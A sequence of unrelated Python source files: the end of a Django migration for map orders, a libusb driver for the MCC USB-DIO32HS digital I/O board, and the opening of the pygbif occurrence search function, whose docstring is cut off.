('fedex_customer_number', models.CharField(blank=True, max_length=100, null=True, verbose_name='FedEx Customer Number')),
('payment_method', models.CharField(blank=True, choices=[('Credit Card', 'Credit Card'), ('Check', 'Check'), ('Pay at Pickup', 'Pay at Pickup'), ('Purchase Order', 'Purchase Order')], max_length=30, null=True, verbose_name='Payment Method')),
('check_number', models.CharField(blank=True, max_length=60, null=True, verbose_name='Check Number')),
('purchase_order_number', models.CharField(blank=True, max_length=60, null=True, verbose_name='Purchase Order Number')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Created')),
('last_modified', models.DateTimeField(auto_now=True, verbose_name='Last Modified')),
],
options={
'verbose_name': 'Map Order',
'verbose_name_plural': 'Map Orders',
'db_table': 'contact_ordermap',
},
),
migrations.AlterField(
model_name='generalcontact',
name='organization',
field=models.CharField(blank=True, max_length=100, null=True, verbose_name='Organization'),
),
]
|
#! /usr/bin/python3
#
# Copyright (c) 2020 <NAME> <<EMAIL>>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
import libusb1
import usb1
import time
import sys
from struct import *
from datetime import datetime
from mccUSB import *
class usb_dio32HS(mccUSB):
USB_DIO32HS_PID = 0x0133
PORTA = 0x0
PORTB = 0x1
DIO_PORTS = 0x2 # Ports A & B
PORT0 = 0x1 # Port A for channel_map
PORT1 = 0x2 # Port B for channel_map
DIR_IN = 0x1
DIR_OUT= 0x0
# Status bit values
IN_SCAN_RUNNING = 0x2 # Input pacer running
IN_SCAN_OVERRUN = 0x4 # Input scan overrun
OUT_SCAN_RUNNING = 0x8 # Output scan running
OUT_SCAN_UNDERRUN = 0x10 # Output scan underrun
IN_SCAN_DONE = 0x20 # Input scan done
OUT_SCAN_DONE = 0x40 # Output scan done
FPGA_CONFIGURED = 0x100 # FPGA is configured
FPGA_CONFIG_MODE = 0x200 # FPGA config mode
# Scan Modes
CONTINUOUS_READOUT = 0x1 # Continuous mode
SINGLEIO = 0x2 # Return data after every read (used for low frequency scans)
FORCE_PACKET_SIZE = 0x4 # Force packet_size
BASE_CLOCK = 96.E6 # Base clock frequency
MAX_PACKET_SIZE_HS = 512 # max packet size for HS device
MAX_PACKET_SIZE_FS = 64 # max packet size for HS device
# Commands and Codes for USB-DIO32HS
# Digital I/O Commands
DTRISTATE = 0x00 # Read/write digital port tristate registers
DPORT = 0x01 # Read digital port pins
DLATCH = 0x02 # Read/write digital port output latch register
# Register Commands
READ_REG = 0x10 # Read the specified register
WRITE_REG = 0x11 # Write the specified register
# Acquisition Commands
IN_SCAN_START = 0x20 # Start input scan
IN_SCAN_STOP = 0x21 # Stop input scan
IN_SCAN_CLEAR_FIFO = 0x22 # Clear data in the input FIFO
IN_BULK_FLUSH = 0x23 # Flush the input Bulk pipe
OUT_SCAN_START = 0x24 # Start output scan
OUT_SCAN_STOP = 0x25 # Stop output scan
OUT_SCAN_CLEAR_FIFO = 0x26 # Clear data in the ouptut FIFO
# Memory Commands
MEMORY = 0x30 # Read/Write EEPROM
MEM_ADDRESS = 0x31 # EEPROM read/write address value
MEM_WRITE_ENABLE = 0x32 # Enable writes to firmware area
# Miscellaneous Commands
STATUS = 0x40 # Read device status
BLINK_LED = 0x41 # Causes the LED to blink
RESET = 0x42 # Reset the device
TRIGGER_CONFIG = 0x43 # External trigger configuration
PATTERN_DETECT_CONFIG = 0x44 # Pattern Detection trigger configuration
SERIAL = 0x48 # Read/Write USB Serial Number
# FPGA Configuration Commands
FPGA_CONFIG = 0x50 # Start FPGA configuration
FPGA_DATA = 0x51 # Write FPGA configuration data
FPGA_VERSION = 0x52 # Read FPGA version
HS_DELAY = 2000
def __init__(self, serial=None):
self.status = 0 # status of the device
self.productID = self.USB_DIO32HS_PID # USB-DIO32HS
self.udev = self.openByVendorIDAndProductID(0x9db, self.productID, serial)
if not self.udev:
raise IOError("MCC USB-DIO32HS not found")
return
# Configure the FPGA
if not (self.Status() & self.FPGA_CONFIGURED) :
# load the FPGA data into memory
from usb_dio32HS_rbf import FPGA_data
print("Configuring FPGA. This may take a while ...")
self.FPGAConfig()
if self.Status() & self.FPGA_CONFIG_MODE:
for i in range(0, len(FPGA_data) - len(FPGA_data)%64, 64) :
self.FPGAData(FPGA_data[i:i+64])
i += 64
if len(FPGA_data) % 64 :
self.FPGAData(FPGA_data[i:i+len(FPGA_data)%64])
if not (self.Status() & self.FPGA_CONFIGURED):
print("Error: FPGA for the USB-DIO32HS is not configured. status = ", hex(self.Status()))
return
else:
print("Error: could not put USB-DIO32HS into FPGA Config Mode. status = ", hex(self.Status()))
return
else:
print("USB-DIO32HS FPGA configured.")
if sys.platform.startswith('linux'):
if self.udev.kernelDriverActive(0):
self.udev.detachKernelDriver(0)
self.udev.resetDevice()
# claim all the needed interfaces for InScan
self.udev.claimInterface(0)
# Find the maxPacketSize for bulk transfers
self.wMaxPacketSize = self.getMaxPacketSize(libusb1.LIBUSB_ENDPOINT_IN | 0x6) #EP IN 6
##############################################
# Digital I/O Commands #
##############################################
# Read/Write digital port tristate register
def DTristateR(self, port=0):
"""
This command reads the digital port tristate registers. The
tristate register determines if the latch register value is driven
onto the port pin. A '1' in the tristate register makes the
corresponding pin an input, a '0' makes it an output.
"""
if port < 0 or port > 1:
raise ValueError('DTristateR: error in port number.')
return
request_type = (DEVICE_TO_HOST | VENDOR_TYPE | DEVICE_RECIPIENT)
wValue = 0
wIndex = port # the port number to select (0-1)
value ,= unpack('H',self.udev.controlRead(request_type, self.DTRISTATE, wValue, wIndex, 2, self.HS_DELAY))
return value
def DTristateW(self, port, value):
"""
This command writes the digital port tristate register. The
tristate register determines if the latch register value is driven
onto the port pin. A '1' in the tristate register makes the
corresponding pin an input, a '0' makes it an output.
"""
if port < 0 or port > 1:
raise ValueError('DTristateW: error in port number.')
return
request_type = (HOST_TO_DEVICE | VENDOR_TYPE | DEVICE_RECIPIENT)
request = self.DTRISTATE
wValue = value & 0xffff
wIndex = port
self.udev.controlWrite(request_type, request, wValue, wIndex, [0x0], self.HS_DELAY)
def DPort(self, port):
"""
This command reads the current state of the digital pins from the specified port.
port = 0 Read port 0
port = 1 Read port 1
port = 2 Read both ports
"""
if port < 0 or port > 2:
raise ValueError('DPort: error in port number.')
return
request_type = (DEVICE_TO_HOST | VENDOR_TYPE | DEVICE_RECIPIENT)
wValue = 0
wIndex = 0
value = unpack('HH',self.udev.controlRead(request_type, self.DPORT, wValue, wIndex, 4, self.HS_DELAY))
if port == 0:
return value[0]
elif port == 1:
return value[1]
else:
return list(value)
def DLatchR(self, port):
"""
This command reads the digital port latch register
port = 0 Read port 0
port = 1 Read port 1
port = 2 Read both ports
"""
if port < 0 or port > 2:
raise ValueError('DLatchR: error in port number.')
return
request_type = (DEVICE_TO_HOST | VENDOR_TYPE | DEVICE_RECIPIENT)
wValue = 0
wIndex = port
value = unpack('HH',self.udev.controlRead(request_type, self.DLATCH, wValue, wIndex, 4, self.HS_DELAY))
if port == 0:
return value[0]
elif port == 1:
return value[1]
else:
return list(value)
def DLatchW(self, port, value):
"""
This command writes the digital port latch register
port = 0 Write port 0
port = 1 Write port 1
port = 2 Write both ports
"""
if port < 0 or port > 2:
raise ValueError('DLatchW: error in port number.')
return
request_type = (HOST_TO_DEVICE | VENDOR_TYPE | DEVICE_RECIPIENT)
request = self.DLATCH
wValue = 0x0
wIndex = port
value = pack('HH', value[0], value[1])
self.udev.controlWrite(request_type, request, wValue, wIndex, value, self.HS_DELAY)
##########################################
# Register Commands #
##########################################
def ReadReg(self, address):
"""
This command reads the FPGA register at the specified address
"""
request_type = (DEVICE_TO_HOST | VENDOR_TYPE | DEVICE_RECIPIENT)
wValue = 0
wIndex = address & 0xff
data = self.udev.controlRead(request_type, self.READ_REG, wValue, wIndex, 1, self.HS_DELAY)
return data
def WriteReg(self, address, value):
"""
This command writes the FPGA register at the specified address.
The user can change the tristate settings with this command, so
any time it is sent, the software must re-check the DTristate
status to know the current state.
"""
request_type = (HOST_TO_DEVICE | VENDOR_TYPE | DEVICE_RECIPIENT)
request = self.WRITE_REG
wValue = value & 0xff
wIndex = address & 0xff
self.udev.controlWrite(request_type, request, wValue, wIndex, [0x0], self.HS_DELAY)
##########################################
# Acquisition Commands #
##########################################
def InScanStart(self, channel_map, count, retrig_count, frequency, options, mode=0):
"""
This command starts the input channel scan. This command will
result in a bus stall if an input scan is currently running.
Notes:
The pacer rate is set by an internal 32-bit incrementing timer
running at a base rate of 96MHz. The timer is controlled by
pacer_period. A pulse will be output at the INPUT_PACER_OUT pin
at every pacer_period interval regardless of mode.
If pacer_period is set to 0, the device does not generate a clock.
It uses the INPUT_PACER_IN pin as the pacer source.
The timer will be reset and sample acquired when its value equals
timer_period. The equation for calculating timer_period is:
timer_period = [96MHz / (sample frequency)] - 1
The data will be returned in packets utilizing a bulk
endpoint. The data will be in the format:
lowchannel sample 0 : lowchannel + 1 sample 0: ... :hichannel sample 0
lowchannel sample 1 : lowchannel + 1 sample 1: ... :hichannel sample 1
...
lowchannel sample n : lowchannel + 1 sample n: ... :hichannel sample n
The scan will not begin until the InScanStart command is
sent (and any trigger conditions are met.) Data will be sent
until reaching the specified count or a InScanStop command is
sent.
The packet_size parameter is used for low sampling rates to avoid
delays in receiving the sampled data. The buffer will be sent,
rather than waiting for the buffer to fill. This mode should not
be used for high sample rates in order to avoid data loss.
Pattern detection is used with the PatternDetectConfig command to
set up a specified number of bits to watch, and then trigger when
those bits reach the specified value.
The retrigger mode option and retrig_count parameter are only used
if trigger is used. This option will cause the trigger to be
rearmed after retrig_count samples are acquired, with a total of
count samples being returned for the entire scan.
channel_map: bit field marking which channels are in the scan
bit 0: 1 = Port 0
bit 1: 1 = Port 1
bits 2-7: Reserved
count: the total number of scans to perform (0 for continuous scan)
retrig_count: the number of scans to perform for each trigger in retrigger mode
pacer_period: pacer timer period value (0 for external clock)
packet_size: number of samples to transfer at a time
options: bit field that controls various options.
bit 0: 1 = use external trigger
bit 1: 1 = user Pattern Detection trigger
bit 2: 1 = retrigger mode, 0 = normal trigger
bits 3-7: Reserved
mode: mode bits:
bit 0: 0 = counting mode, 1 = CONTINUOUS_READOUT
bit 1: 1 = SINGLEIO
bit 2: 1 = use packet size passed usbDevice1808->packet_size
bit 3: 1 = convert to voltages
"""
request_type = (HOST_TO_DEVICE | VENDOR_TYPE | DEVICE_RECIPIENT)
if frequency > 8.E6: # 8MHz throughput
frequency = 8.E6
if frequency == 0.0:
pacer_period = 0 # use external clock
else:
pacer_period = round((self.BASE_CLOCK / frequency) - 1)
channel_map &= 0x3
if channel_map == 0x0:
raise ValueError('InScanRead: error in channel_map.')
return
if channel_map == 0x1 or channel_map == 0x2:
nchan = 1
else:
nchan = 2
bytesPerScan = nchan*2 # 2 ports of 16 bits each
self.in_nchan = nchan # number of input channels
self.in_frequency = frequency # input frequency
self.in_channel_map = channel_map # input channel map
self.mode = mode & 0xff # input scan mode
if count == 0:
self.mode |= self.CONTINUOUS_READOUT
self.bytesToRead = -1 # disable and sample forever
else:
self.bytesToRead = count*bytesPerScan # total number of bytes to read
if self.mode & self.FORCE_PACKET_SIZE:
packet_size = self.packet_size
elif self.mode & self.SINGLEIO:
packet_size = nchan
elif self.mode & self.CONTINUOUS_READOUT:
packet_size = int((( (self.wMaxPacketSize//bytesPerScan) * bytesPerScan) // 2))
else:
packet_size = self.wMaxPacketSize // 2
self.packet_size = packet_size
if self.mode & self.CONTINUOUS_READOUT:
self.in_count = 0
else:
self.in_count = count
self.in_retrig_count = retrig_count
self.in_options = options
packet_size -= 1 # force to uint8_t size in range 0-255
scanPacket = bytearray(15)
scanPacket[0] = channel_map
pack_into('III',scanPacket, 1, count, retrig_count, pacer_period)
scanPacket[13] = packet_size
scanPacket[14] = options
result = self.udev.controlWrite(request_type, self.IN_SCAN_START, 0x0, 0x0, scanPacket, timeout = 200)
self.status = self.Status()
def InScanRead(self):
if self.mode & self.CONTINUOUS_READOUT or self.mode & self.SINGLEIO :
nSamples = self.packet_size
else:
nSamples = self.in_count*self.in_nchan
try:
data = list(unpack('H'*nSamples, self.udev.bulkRead(libusb1.LIBUSB_ENDPOINT_IN | 6, int(2*nSamples), self.HS_DELAY)))
except:
print('InScanRead: error in bulkRead.')
if len(data) != nSamples:
raise ValueError('InScanRead: error in number of samples transferred.')
return len(data)
if self.bytesToRead > len(data)*2:
self.bytesToRead -= len(data)*2
elif self.bytesToRead > 0 and self.bytesToRead < len(data)*2: # all done
self.InScanStop()
self.InScanClearFIFO()
self.status = self.Status()
return data
if self.mode & self.CONTINUOUS_READOUT:
return data
# if nbytes is a multiple of wMaxPacketSize the device will send a zero byte packet.
if nSamples*2%self.wMaxPacketSize == 0:
dummy = self.udev.bulkRead(libusb1.LIBUSB_ENDPOINT_IN | 6, 2, 100)
self.status = self.Status()
if self.status & self.IN_SCAN_OVERRUN:
self.InScanStop()
raise ValueError('InScanRead: Scan overrun.')
return
return data
def InScanStop(self):
"""
This command stops the input scan (if running).
"""
request_type = (HOST_TO_DEVICE | VENDOR_TYPE | DEVICE_RECIPIENT)
request = self.IN_SCAN_STOP
wValue = 0
wIndex = 0
result = self.udev.controlWrite(request_type, request, wValue, wIndex, [0x0], timeout = 100)
def InScanClearFIFO(self):
"""
This command clears the input firmware buffer
"""
request_type = (HOST_TO_DEVICE | VENDOR_TYPE | DEVICE_RECIPIENT)
request = self.IN_SCAN_CLEAR_FIFO
wValue = 0
wIndex = 0
result = self.udev.controlWrite(request_type, request, wValue, wIndex, [0x0], timeout = 100)
def InBulkFlush(self, count=5):
"""
This command flushes the input Bulk ipie a number of times
"""
request_type = (HOST_TO_DEVICE | VENDOR_TYPE | DEVICE_RECIPIENT)
request = self.IN_BULK_FLUSH
wValue = count
wIndex = 0
result = self.udev.controlWrite(request_type, request, wValue, wIndex, [0x0], timeout = 100)
def OutScanStart(self, channel_map, count, retrig_count, frequency, options):
"""
This command starts the output channel scan. This command will
result in a bus stall if an input scan is currently running.
Notes:
The output scan operates with the host continuously transferring
data from the outputs until the end of the scan. If the count
parameter is 0, the scan will run until the OutScanStop command is
issued by the host; if it is nonzero, the scan will stop
automatically after the specified number of scans have been output.
The channels in the scan are selected in the options bit field.
Scans refers to the number of updates to the channels (if both
channels are used, one scan is an update to both channels.)
The time base is controlled by an internal 32-bit timer running at
a base rate of 96MHz. The timer is controlled by pacer_period.
The equation for calculating pacer_period is:
pacer_period = [96MHz / (sample frequency)] - 1
The same time base is used for all channels when the scan involved
multiple channels. The output data is to be sent using bulk out
endpoints. The data must be in the format:
low channel sample 0: [high channel sample 0]
low channel sample 1: [high channel sample 1]
...
low channel sample 1: [high channel sample n]
The output data is written to an internal FIFO. The bulk endpoint
data is only accepted if there is room in the FIFO. Output data
may be sent to the FIFO before the start of the scan, and the FIFO
is cleared when the OutScanClearFIFO command is received. The
scan will not begin until the OutScanStart command is sent (and
output data is in the FIFO). Data will be output until reaching
the specified number of scans (in single execution mode) or an
OutScanStop command is sent.
channel_map: bit field marking which channels are in the scan
bit 0: 1 = Port 0
bit 1: 1 = Port 1
bits 2-7: Reserved
count: the total number of scans to perform (0 for continuous scan)
retrig_count: the number of scans to perform for each trigger in retrigger mode
pacer_period: pacer timer period value (0 for external clock)
options: bit field that controls various options
bit 0: 1 = use external trigger
bit 1: 1 = use Pattern Detection trigger
bit 2 1 = use retrigger mode, 0 = normal trigger
bits 3-7: Reserved
"""
request_type = (HOST_TO_DEVICE | VENDOR_TYPE | DEVICE_RECIPIENT)
if frequency == 0:
pacer_period = 0 # use ICLKO
else:
pacer_period = round((self.BASE_CLOCK / frequency) - 1)
channel_map &= 0x3
if channel_map == 0x0:
raise ValueError('OutScanWrite: error in channel_map.')
return
if channel_map == 0x1 or channel_map == 0x2:
nchan = 1
else:
nchan = 2
bytesPerScan = nchan*2 # 2 ports of 16 bits each
if count == 0:
self.bytesToWrite = -1
else:
self.bytesToWrite = count*bytesPerScan
self.out_nchan = nchan # number of output channels
self.out_frequency = frequency
scanPacket = bytearray(14)
scanPacket[0] = channel_map
pack_into('III',scanPacket, 1, count, retrig_count, pacer_period)
scanPacket[13] = options
result = self.udev.controlWrite(request_type, self.OUT_SCAN_START, 0x0, 0x0, scanPacket, timeout = 200)
self.status = self.Status()
def OutScanWrite(self, data):
# data is a list of unsigned 16 bit numbers
value = [0]*len(data)*2
timeout = int(500 + 1000*len(data)/self.out_frequency)
for i in range(len(data)):
value[2*i] = data[i] & 0xff
value[2*i+1] = (data[i] >> 8) & 0xff
try:
result = self.udev.bulkWrite(2, value, timeout)
except:
print('OutScanWrite: error in bulkWrite')
return
def OutScanStop(self):
"""
This command stops the output scan (if running).
"""
request_type = (HOST_TO_DEVICE | VENDOR_TYPE | DEVICE_RECIPIENT)
request = self.OUT_SCAN_STOP
wValue = 0
wIndex = 0
result = self.udev.controlWrite(request_type, request, wValue, wIndex, [0x0], timeout = 100)
def OutScanClearFIFO(self):
"""
This command clears the output firmware buffer
"""
request_type = (HOST_TO_DEVICE | VENDOR_TYPE | DEVICE_RECIPIENT)
request = self.OUT_SCAN_CLEAR_FIFO
wValue = 0
wIndex = 0
result = self.udev.controlWrite(request_type, request, wValue, wIndex, [0x0], timeout = 100)
##########################################
# Memory Commands #
##########################################
def MemoryR(self, length):
"""
This command reads or writes data from the EEPROM memory. The
read will begin at the current address, which may be set with
MemAddress. The address will automatically increment during a
read or write but stay within the range allowed for the EEPROM.
The amount of data to be written or read is specified in wLength.
The range from 0x0000 to 0x6FFF is used for storing the
microcontroller firmware and is write-protected during normal
operation.
"""
request_type = (DEVICE_TO_HOST | VENDOR_TYPE | DEVICE_RECIPIENT)
wValue = 0
wIndex = 0
data = self.udev.controlRead(request_type, self.MEMORY, wValue, wIndex, length, self.HS_DELAY*length)
return data
def MemoryW(self, data):
request_type = (HOST_TO_DEVICE | VENDOR_TYPE | DEVICE_RECIPIENT)
request = self.MEMORY
wValue = 0
wIndex = 0
self.udev.controlWrite(request_type, request, wValue, wIndex, data, self.HS_DELAY)
def MemAddressR(self):
"""
This command reads or writes the address used for memory accesses.
The upper byte is used to denominate different memory areas. The
memory map for this device is
Address Description
============= ============================
0x0000-0x6FFF Microcontroller firmware (write protected)
0x7000-0x7FFF User data
The firmware area is protected by a separate command so is not typically
write-enabled. The calibration area is unlocked by writing the value 0xAA55
to address 0x8000. The area will remain unlocked until the device is reset
or a value other than 0xAA55 is written to address 0x8000.
"""
request_type = (DEVICE_TO_HOST | VENDOR_TYPE | DEVICE_RECIPIENT)
wValue = 0
wIndex = 0
address = self.udev.controlRead(request_type, self.MEM_ADDRESS, wValue, wIndex, 2, self.HS_DELAY)
return address[0] + (address[1] << 8)
def MemAddressW(self, address):
request_type = (HOST_TO_DEVICE | VENDOR_TYPE | DEVICE_RECIPIENT)
request = self.MEM_ADDRESS
wValue = 0
wIndex = 0
barray = [address & 0xff, (address >> 8) & 0xff]
self.udev.controlWrite(request_type, request, wValue, wIndex, barray, self.HS_DELAY)
def MemWriteEnable(self):
"""
This command enables writes to the EEPROM memory in the range
0x0000-0x6FFF. This command is only to be used when updating the
microcontroller firmware.
"""
request_type = (HOST_TO_DEVICE | VENDOR_TYPE | DEVICE_RECIPIENT)
request = self.MEM_WRITE_ENABLE
wValue = 0
wIndex = 0
unlock_code = 0xad
self.udev.controlWrite(request_type, request, wValue, wIndex, [unlock_code], self.HS_DELAY)
##########################################
# Miscellaneous Commands #
##########################################
def Status(self):
"""
This command retrieves the status of the device.
"""
request_type = (DEVICE_TO_HOST | VENDOR_TYPE | DEVICE_RECIPIENT)
wValue = 0
wIndex = 0
value ,= unpack('H',self.udev.controlRead(request_type, self.STATUS, wValue, wIndex, 2, self.HS_DELAY))
return value
def BlinkLED(self, count):
"""
This command will blink the device LED "count" number of times
"""
request_type = (HOST_TO_DEVICE | VENDOR_TYPE | DEVICE_RECIPIENT)
request = self.BLINK_LED
wValue = 0
wIndex = 0
self.udev.controlWrite(request_type, request, wValue, wIndex, [count], self.HS_DELAY)
def Reset(self):
"""
This function causes the device to perform a reset. The device
disconnects from the USB bus and resets its microcontroller.
"""
request_type = (HOST_TO_DEVICE | VENDOR_TYPE | DEVICE_RECIPIENT)
request = self.RESET
wValue = 0
wIndex = 0
self.udev.controlWrite(request_type, request, wValue, wIndex, [0x0], self.HS_DELAY)
def TriggerConfig(self, options):
"""
This function configures the Scan trigger. Once the trigger is
received, the Scan will proceed as configured. The "use
trigger" option must be used in the ScanStart command to
utilize this feature.
options: bit 0: trigger mode (0 = level, 1 = edge)
bit 1: trigger polarity (0 = low / falling, 1 = high / rising)
bits 2-7: reserved
"""
request_type = (HOST_TO_DEVICE | VENDOR_TYPE | DEVICE_RECIPIENT)
request = self.TRIGGER_CONFIG
wValue = 0x0
wIndex = 0x0
self.udev.controlWrite(request_type, request, wValue, wIndex, [options], self.HS_DELAY)
def TriggerConfigR(self):
request_type = (DEVICE_TO_HOST | VENDOR_TYPE | DEVICE_RECIPIENT)
wValue = 0
wIndex = 0
value ,= unpack('B',self.udev.controlRead(request_type, self.TRIGGER_CONFIG, wValue, wIndex, 1, self.HS_DELAY))
return value
def PatternDetectConfig(self, pattern, mask, options):
"""
This function configures the Pattern Detection trigger. Once the
trigger is received, the scan will proceed as configued. The "use
Pattern Detection trigger" option must be used in the InScanStart
command to utilize this feature.
pattern: The pattern on which to trigger
mask: These bits will mask the inputs such that only bits set to 1 here will be compared to the pattern
options: Bit field that controls various options
bit 0: Trigger Port (0 = Port 0, 1 = Port 1)
bits 1-2: 00 = Equal to Pattern
01 = Not equal to Pattern
10 = Greater than Pattern's numeric value
11 = Less than Pattern's numeric value
bits 3-7: Reserved
"""
request_type = (HOST_TO_DEVICE | VENDOR_TYPE | DEVICE_RECIPIENT)
request = self.PATTERN_DETECT_CONFIG
wValue = 0
wIndex = 0
value = pack('HHB', pattern, mask, options)
self.udev.controlWrite(request_type, request, wValue, wIndex, value, self.HS_DELAY)
def PatternDetectConfigR(self):
request_type = (DEVICE_TO_HOST | VENDOR_TYPE | DEVICE_RECIPIENT)
request = self.PATTERN_DETECT_CONFIG
wValue = 0
wIndex = 0
value = unpack('HHB', self.udev.controlRead(request_type, request, wValue, wIndex, 5, self.HS_DELAY))
return value
def GetSerialNumber(self):
"""
This commands reads the device USB serial number. The serial
number consists of 8 bytes, typically ASCII numeric or hexadecimal digits
(i.e. "00000001").
"""
request_type = (DEVICE_TO_HOST | VENDOR_TYPE | DEVICE_RECIPIENT)
wValue = 0
wIndex = 0
value = self.udev.controlRead(request_type, self.SERIAL, wValue, wIndex, 8, self.HS_DELAY)
return value.decode()
def WriteSerialNumber(self, serial):
request_type = (HOST_TO_DEVICE | VENDOR_TYPE | DEVICE_RECIPIENT)
request = self.SERIAL
wValue = 0
wIndex = 0
barray = bytearray(8)
for i in range(8):
barray[i] = ord(serial[i])
self.udev.controlWrite(request_type, request, wValue, wIndex, barray, self.HS_DELAY)
##########################################
# FPGA Commands #
##########################################
def FPGAConfig(self):
"""
This command puts the device into FPGA configuration update mode,
which allows downloading the configuration for the FPGA. The
unlock code must be correct as a further safely device. If the
device is not in FPGA config mode, then the FPGAData command will
result in a control pipe stall.
Use the Status command to determine if the FPGA needs to be
configured. If so, use this command to enter configuration mode.
Open the .rbf file containing the FPGA configuration and stream
the data to the device using FPGAData. After the FPGA is
configured, then the DAQ commands will work.
"""
request_type = (HOST_TO_DEVICE | VENDOR_TYPE | DEVICE_RECIPIENT)
request = self.FPGA_CONFIG
unlock_code = 0xad
wValue = 0
wIndex = 0
self.udev.controlWrite(request_type, request, wValue, wIndex, [unlock_code], self.HS_DELAY)
def FPGAData(self, data):
"""
This command writes the FPGA configuration data to the device. This
command is not accepted unless the device is in FPGA config mode. The
number of bytes to be written must be specified in wLength.
data: max length is 64 bytes
"""
if len(data) > 64:
raise ValueError('FPGAData: max length is 64 bytes.')
return
request_type = (HOST_TO_DEVICE | VENDOR_TYPE | DEVICE_RECIPIENT)
request = self.FPGA_DATA
wValue = 0
wIndex = 0
self.udev.controlWrite(request_type, request, wValue, wIndex, data, self.HS_DELAY)
def FPGAVersion(self):
"""
This command reads the FPGA version. The version is in
hexadecimal BCD, i.e. 0x0102 is version 01.02.
"""
request_type = (DEVICE_TO_HOST | VENDOR_TYPE | DEVICE_RECIPIENT)
wValue = 0
wIndex = 0
version ,= unpack('H',self.udev.controlRead(request_type, self.FPGA_VERSION, wValue, wIndex, 2, self.HS_DELAY))
return "{0:02x}.{1:02x}".format((version>>8)&0xff, version&0xff)
def printStatus(self):
status = self.Status()
print('**** USB-DIO32HS Status ****')
if status & self.IN_SCAN_RUNNING:
print(' Input scan running.')
if status & self.IN_SCAN_OVERRUN:
print(' Input scan overrun.')
if status & self.OUT_SCAN_RUNNING:
print(' Output scan running.')
if status & self.OUT_SCAN_UNDERRUN:
print(' Output scan underrun.')
if status & self.IN_SCAN_DONE:
print(' Input scan done.')
if status & self.OUT_SCAN_DONE:
print(' Output scan done.')
if status & self.FPGA_CONFIGURED:
print(' FPGA is configured.')
if status & self.FPGA_CONFIG_MODE:
print(' FPGA in configuration mode.')
|
import re
from pygbif.gbifutils import gbif_baseurl, bool2str, requests_argset, gbif_GET
def search(
taxonKey=None,
repatriated=None,
kingdomKey=None,
phylumKey=None,
classKey=None,
orderKey=None,
familyKey=None,
genusKey=None,
subgenusKey=None,
scientificName=None,
country=None,
publishingCountry=None,
hasCoordinate=None,
typeStatus=None,
recordNumber=None,
lastInterpreted=None,
continent=None,
geometry=None,
recordedBy=None,
recordedByID=None,
identifiedByID=None,
basisOfRecord=None,
datasetKey=None,
eventDate=None,
catalogNumber=None,
year=None,
month=None,
decimalLatitude=None,
decimalLongitude=None,
elevation=None,
depth=None,
institutionCode=None,
collectionCode=None,
hasGeospatialIssue=None,
issue=None,
q=None,
spellCheck=None,
mediatype=None,
limit=300,
offset=0,
establishmentMeans=None,
facet=None,
facetMincount=None,
facetMultiselect=None,
**kwargs
):
"""
Search GBIF occurrences
:param taxonKey: [int] A GBIF occurrence identifier
:param q: [str] Simple search parameter. The value for this parameter can be a simple word or a phrase.
:param spellCheck: [bool] If ``True`` ask GBIF to check your spelling of the value passed to the ``search`` parameter.
IMPORTANT: This only checks the input to the ``search`` parameter, and no others. Default: ``False``
:param repatriated: [str] Searches for records whose publishing country is different to the country where the record was recorded in
:param kingdomKey: [int] Kingdom classification key
:param phylumKey: [int] Phylum classification key
:param classKey: [int] Class classification key
:param orderKey: [int] Order classification key
:param familyKey: [int] Family classification key
:param genusKey: [int] Genus classification key
:param subgenusKey: [int] Subgenus classification key
:param scientificName: [str] A scientific name from the GBIF backbone. All included and synonym taxa are included in the search.
:param datasetKey: [str] The occurrence dataset key (a uuid)
:param catalogNumber: [str] An identifier of any form assigned by the source within a physical collection or digital dataset for the record which may not unique, but should be fairly unique in combination with the institution and collection code.
:param recordedBy: [str] The person who recorded the occurrence.
:param recordedByID: [str] Identifier (e.g. ORCID) for the person who recorded the occurrence
:param identifiedByID: [str] Identifier (e.g. ORCID) for the person who provided the taxonomic identification of the occurrence.
:param collectionCode: [str] An identifier of any form assigned by the source to identify the physical collection or digital dataset uniquely within the text of an institution.
:param institutionCode: [str] An identifier of any form assigned by the source to identify the institution the record belongs to. Not guaranteed to be que.
:param country: [str] The 2-letter country code (as per ISO-3166-1) of the country in which the occurrence was recorded. See here http://en.wikipedia.org/wiki/ISO_3166-1_alpha-2
:param basisOfRecord: [str] Basis of record, as defined in our BasisOfRecord enum here http://gbif.github.io/gbif-api/apidocs/org/gbif/api/vocabulary/BasisOfRecord.html Acceptable values are:
- ``FOSSIL_SPECIMEN`` An occurrence record describing a fossilized specimen.
- ``HUMAN_OBSERVATION`` An occurrence record describing an observation made by one or more people.
- ``LIVING_SPECIMEN`` An occurrence record describing a living specimen.
- ``MACHINE_OBSERVATION`` An occurrence record describing an observation made by a machine.
- ``MATERIAL_CITATION`` An occurrence record based on a reference to a scholarly publication.
- ``OBSERVATION`` An occurrence record describing an observation.
- ``OCCURRENCE`` An existence of an organism at a particular place and time. No more specific basis.
- ``PRESERVED_SPECIMEN`` An occurrence record describing a preserved specimen.
:param eventDate: [date] Occurrence date in ISO 8601 format: yyyy, yyyy-MM, yyyy-MM-dd, or
MM-dd. Supports range queries, smaller,larger (e.g., ``1990,1991``, whereas ``1991,1990``
wouldn't work)
:param year: [int] The 4 digit year. A year of 98 will be interpreted as AD 98. Supports range queries,
smaller,larger (e.g., ``1990,1991``, whereas ``1991,1990`` wouldn't work)
:param month: [int] The month of the year, starting with 1 for January. Supports range queries,
smaller,larger (e.g., ``1,2``, whereas ``2,1`` wouldn't work)
:param decimalLatitude: [float] Latitude in decimals between -90 and 90 based on WGS 84.
Supports range queries, smaller,larger (e.g., ``25,30``, whereas ``30,25`` wouldn't work)
:param decimalLongitude: [float] Longitude in decimals between -180 and 180 based on WGS 84.
Supports range queries (e.g., ``-0.4,-0.2``, whereas ``-0.2,-0.4`` wouldn't work).
:param publishingCountry: [str] The 2-letter country code (as per ISO-3166-1) of the
country in which the occurrence was recorded.
:param elevation: [int/str] Elevation in meters above sea level. Supports range queries, smaller,larger
(e.g., ``5,30``, whereas ``30,5`` wouldn't work)
:param depth: [int/str] Depth in meters relative to elevation. For example 10 meters below a
